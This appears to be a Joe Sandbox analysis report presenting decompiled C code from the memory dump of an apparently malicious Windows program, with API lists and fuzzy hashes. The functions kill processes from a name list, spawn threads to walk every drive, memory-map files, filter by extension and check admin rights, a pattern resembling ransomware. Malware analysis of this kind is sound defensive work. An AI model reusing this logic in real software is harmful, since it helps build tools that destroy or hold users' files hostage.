Opcode Fuzzy Hash: 8217c52b7df5c6fc0c02e62570d726a4e7a466420ec1ae4a86d8147b3f1c7347
Instruction Fuzzy Hash: 22118E32104209ABD711DF68EC0AFAB7BACFB4D722F00069AFE41D6190E77199218FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC48A8 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC48A8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000);
					}
					return CloseHandle(_t24);
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x0fbc48a8
0x0fbc48a8
0x0fbc48b0
0x0fbc48b0
0x0fbc48b5
0x0fbc48bd
0x0fbc48cb
0x0fbc48cf
0x0fbc48d4
0x0fbc48e1
0x0fbc48e1
0x0fbc48cf
0x0fbc48eb
0x0fbc48ec
0x0fbc48ec
0x0fbc48f2
0x00000000
0x00000000
0x0fbc48f4
0x0fbc48f4
0x0fbc48fa
0x0fbc4900
0x0fbc4900
0x0fbc4905
0x0fbc48a4
0x0fbc48b0
0x00000000
0x00000000
0x00000000
0x0fbc48b0
0x0fbc4909
0x0fbc4913
0x0fbc4913
0x0fbc4922
0x0fbc48b0
0x0fbc48b5
0x0fbc48bd
0x0fbc48cb
0x0fbc48cf
0x0fbc48d4
0x0fbc48e1
0x0fbc48e1
0x0fbc48cf
0x0fbc48eb
0x0fbc48ec
0x0fbc48ec
0x0fbc48ef

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FBC48B5
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FBC48C5
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FBC48D4
CloseHandle.KERNEL32(00000000), ref: 0FBC48E1
Process32NextW.KERNEL32(?,00000000), ref: 0FBC48FA
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC4913
CloseHandle.KERNEL32(?), ref: 0FBC491A

Strings

i)w, xrefs: 0FBC48B5

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$FreeNextOpenProcess32TerminateVirtuallstrcmpi
String ID: i)w
API String ID: 999196985-1280834553
Opcode ID: c6e95a9b3d9e8923686dc6bf1a6c73c3a7fc395a87ac92ce4afedd1a71c53545
Instruction ID: c1683fce564be7ac8904ccf71296c944f59d1e98a39fd1906b248dfc2533f841
Opcode Fuzzy Hash: c6e95a9b3d9e8923686dc6bf1a6c73c3a7fc395a87ac92ce4afedd1a71c53545
Instruction Fuzzy Hash: F801F936200105EFD7119F52FCA9BAB776CEF89B22F1100A8FD09A7041DB74A9168FE1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3E20 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBC3E20(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xfbcf348; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0FBC6DE0, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0FBC5670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

0x0fbc3e26
0x0fbc3e38
0x0fbc3e3c
0x0fbc3e40
0x0fbc3e4b
0x0fbc3e4e
0x0fbc3e50
0x0fbc3e53
0x0fbc3e58
0x0fbc3e5c
0x0fbc3e61
0x0fbc3e6b
0x0fbc3e6f
0x0fbc3e76
0x0fbc3e80
0x0fbc3e84
0x0fbc3e8a
0x0fbc3e93
0x0fbc3ea2
0x0fbc3ea5
0x0fbc3eb2
0x0fbc3eb5
0x0fbc3ebb
0x0fbc3ec2
0x0fbc3ecf
0x0fbc3ed3
0x0fbc3ed4
0x0fbc3ed4
0x0fbc3ed7
0x0fbc3ed8
0x0fbc3ee6
0x0fbc3eea
0x0fbc3eed
0x0fbc3ef7
0x0fbc3eff
0x0fbc3f05
0x0fbc3f0b
0x0fbc3f11
0x0fbc3f1b
0x0fbc3f22
0x0fbc3f26
0x0fbc3f2a
0x0fbc3f2c
0x0fbc3f34
0x0fbc3f3d
0x0fbc3f9c
0x0fbc3fa0
0x0fbc3f3f
0x0fbc3f3f
0x0fbc3f42
0x0fbc3f48
0x0fbc3f4f
0x0fbc3f50
0x0fbc3f57
0x0fbc3f5b
0x0fbc3f60
0x0fbc3f67
0x0fbc3f6a
0x0fbc3f6e
0x0fbc3f78
0x0fbc3f7a
0x0fbc3f7e
0x0fbc3f81
0x0fbc3f84
0x0fbc3f84
0x0fbc3f84
0x0fbc3f8a
0x0fbc3f8e
0x0fbc3f92
0x0fbc3f96
0x0fbc3f96
0x0fbc3fa6
0x0fbc3fca
0x0fbc3fa8
0x0fbc3fa8
0x0fbc3fb2
0x0fbc3fb6
0x0fbc3fbd
0x0fbc3fd4
0x0fbc3fd8
0x0fbc3ff6

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0FBC3E40
GetTickCount.KERNEL32 ref: 0FBC3E65
GetDriveTypeW.KERNEL32(?), ref: 0FBC3E8A
CreateThread.KERNEL32(00000000,00000000,0FBC6DE0,?,00000000,00000000), ref: 0FBC3EC9
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0FBC3F0B
GetTickCount.KERNEL32 ref: 0FBC3F11

Strings

?:\, xrefs: 0FBC3E53

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 7a670ff279982c8344214853151b9efb3eb2cae35231909d5232fab0ac50a115
Instruction ID: d5b61d86d2fcef634e5dd8039a7d087c43602fc62b93d0e61b5d50a41e5890a4
Opcode Fuzzy Hash: 7a670ff279982c8344214853151b9efb3eb2cae35231909d5232fab0ac50a115
Instruction Fuzzy Hash: 79512270A083019FC310CF19D898B5BBBE5FF88324F548A6DEA899B351D375A944CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6DE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC6DE0(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0FBC6C90(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0fbc6df9
0x0fbc6dff
0x0fbc6e0e
0x0fbc6e1c
0x0fbc6e30
0x0fbc6e38
0x0fbc6e40
0x0fbc6e48
0x0fbc6e56
0x0fbc6e6b
0x0fbc6e7b
0x0fbc6e83

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0FBC6DF9
wsprintfW.USER32 ref: 0FBC6E0E
InitializeCriticalSection.KERNEL32(?), ref: 0FBC6E1C
VirtualAlloc.KERNEL32 ref: 0FBC6E50

Part of subcall function 0FBC6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBC6CC3
Part of subcall function 0FBC6C90: lstrcatW.KERNEL32(00000000,0FBCFEC4), ref: 0FBC6CDB
Part of subcall function 0FBC6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBC6CE5

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0FBC6E7B
ExitThread.KERNEL32 ref: 0FBC6E83

Strings

%c:\, xrefs: 0FBC6E08

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: a7a5a48a28d417032a29b0945952d87f3db8ab125fdf9f189af22e61b9706b16
Instruction ID: 5730dfffe02e6df8f01dba572f8851524e813bdda575cb603a2c81b6c667824c
Opcode Fuzzy Hash: a7a5a48a28d417032a29b0945952d87f3db8ab125fdf9f189af22e61b9706b16
Instruction Fuzzy Hash: 3601C4B0144304BBE3109F12DC9AF177BACAB49B21F004648FB649A1C1D7B89515CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC2890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0FBC2890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0FBC3030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0FBC3030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E0FBC3030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E0FBC82A0(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E0FBC2830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x0fbc2890
0x0fbc2899
0x0fbc289b
0x0fbc28b1
0x0fbc28b6
0x0fbc28f9
0x0fbc2901
0x0fbc28b8
0x0fbc28c0
0x0fbc28c3
0x0fbc28ca
0x0fbc28cf
0x0fbc28d0
0x0fbc28d8
0x0fbc28e5
0x0fbc28eb
0x0fbc28f0
0x0fbc2910
0x0fbc2914
0x0fbc2916
0x0fbc291d
0x0fbc291f
0x0fbc2920
0x0fbc2920
0x0fbc2923
0x0fbc2926
0x0fbc292b
0x0fbc292b
0x0fbc292e
0x0fbc293f
0x0fbc2942
0x0fbc2942
0x0fbc2951
0x0fbc2954
0x0fbc295e
0x0fbc28f2
0x0fbc28f3
0x00000000
0x0fbc28f3
0x0fbc28f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,772D82B0,00000000,?,?,0FBC2C02), ref: 0FBC28AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0FBC2C02), ref: 0FBC28BA
CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0FBC2C02), ref: 0FBC28E5
CloseHandle.KERNEL32(00000000,?,?,0FBC2C02), ref: 0FBC28F3
MapViewOfFile.KERNEL32(00000000,772D82B1,00000000,00000000,00000000,?,?,0FBC2C02), ref: 0FBC290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0FBC2C02), ref: 0FBC2942
CloseHandle.KERNEL32(?,?,?,0FBC2C02), ref: 0FBC2951
CloseHandle.KERNEL32(00000000,?,?,0FBC2C02), ref: 0FBC2954

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: 5c26d8c559a01b24257e2d8b49869bf094335dff9d5df4bbc7ad016ccea5f342
Instruction ID: cd02d3527c9794b5672fcadbaec6107ac8f54f9ef377d7d8041f02c31f6afa85
Opcode Fuzzy Hash: 5c26d8c559a01b24257e2d8b49869bf094335dff9d5df4bbc7ad016ccea5f342
Instruction Fuzzy Hash: 48210772A012187FE7106B75AC85FBF776CDB4A676F4042A8FD01E3181D6389C114DE1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6850 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBC6850(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xfbd2a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xfbd2a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

0x0fbc6853
0x0fbc685c
0x0fbc685e
0x0fbc6872
0x0fbc6877
0x0fbc687c
0x0fbc6890
0x0fbc689a
0x0fbc6880
0x0fbc6880
0x0fbc6886
0x0fbc6889
0x0fbc688a
0x00000000
0x00000000
0x00000000
0x0fbc688a
0x0fbc688e
0x0fbc68b7
0x0fbc68bf
0x0fbc68c5
0x0fbc68cb
0x0fbc68d0
0x0fbc68d6
0x0fbc6922
0x0fbc6929
0x0fbc692c
0x0fbc68d8
0x0fbc68d8
0x0fbc68de
0x0fbc68e2
0x0fbc68e4
0x0fbc68e4
0x0fbc68e9
0x0fbc6909
0x0fbc690d
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc68eb
0x0fbc68f0
0x0fbc68f0
0x0fbc68f6
0x00000000
0x00000000
0x0fbc68fc
0x0fbc68fe
0x00000000
0x0fbc6900
0x0fbc6900
0x0fbc6907
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc6907
0x00000000
0x0fbc68fe
0x0fbc6920
0x0fbc6920
0x00000000
0x0fbc6920
0x00000000
0x0fbc690f
0x0fbc690f
0x0fbc6913
0x0fbc6916
0x0fbc6919
0x0fbc691e
0x0fbc68de
0x0fbc692f
0x0fbc6937
0x0fbc6946
0x00000000
0x00000000
0x00000000
0x0fbc688e
0x0fbc6860
0x0fbc6869
0x0fbc6869

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0FBC698A), ref: 0FBC6872

Strings

%s , xrefs: 0FBC68B9

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: 91069ff8d528a4d4f30e5f3d412a3e27fc0340e2d8cea8b3004c1d704acfc8ca
Instruction ID: e32d1a96b2b252f77c74a165be78d41a11524dd0df7b9c87679958b74f92e481
Opcode Fuzzy Hash: 91069ff8d528a4d4f30e5f3d412a3e27fc0340e2d8cea8b3004c1d704acfc8ca
Instruction Fuzzy Hash: D4212632A0022897D7305B1DBC10BB373AAEB88722F4541AEEC4D9B181E7F569518AD0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC4C40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBC4C40(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0FBC9010( &_v92, 0, 0x44);
				_t15 =  *0xfbd2a6c; // 0x49c
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xfbd2a68; // 0x4a4
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0fbc4c4c
0x0fbc4c52
0x0fbc4c54
0x0fbc4c59
0x0fbc4c5e
0x0fbc4c66
0x0fbc4c69
0x0fbc4c6c
0x0fbc4c71
0x0fbc4c78
0x0fbc4c7d
0x0fbc4c88
0x0fbc4ca7
0x0fbc4cbd
0x0fbc4cc8
0x0fbc4ca9
0x0fbc4cb3
0x0fbc4cb3

APIs

_memset.LIBCMT ref: 0FBC4C59
CreateProcessW.KERNEL32 ref: 0FBC4C9F
GetLastError.KERNEL32(?,?,00000000), ref: 0FBC4CA9
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FBC4CBD
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FBC4CC2

Strings

D, xrefs: 0FBC4C88

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 3ded5f06b6b090fff1411225944aaf165f794c8e9146ce9580d6f57825b5201f
Instruction ID: 347ac2b6817162da443f7fc4c5e2a575a7ad950531b258e8f4635f8d330eb7b6
Opcode Fuzzy Hash: 3ded5f06b6b090fff1411225944aaf165f794c8e9146ce9580d6f57825b5201f
Instruction Fuzzy Hash: 15015E71E4021CAADB20DBA59C06BDE7BB8EB08B11F100156EA08BB180E7B525548FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3AA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0FBC3AA0() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0fbc3aa9
0x0fbc3ac9
0x0fbc3ad0
0x0fbc3ad8
0x0fbc3aef
0x0fbc3afe
0x0fbc3b05
0x0fbc3b07
0x0fbc3b0a
0x0fbc3b16
0x0fbc3add
0x0fbc3add
0x0fbc3add

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FBC3AD0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0FBC3AE3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0FBC3AEF
FreeSid.ADVAPI32(?), ref: 0FBC3B0A

Strings

advapi32.dll, xrefs: 0FBC3ADE
CheckTokenMembership, xrefs: 0FBC3AE9

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

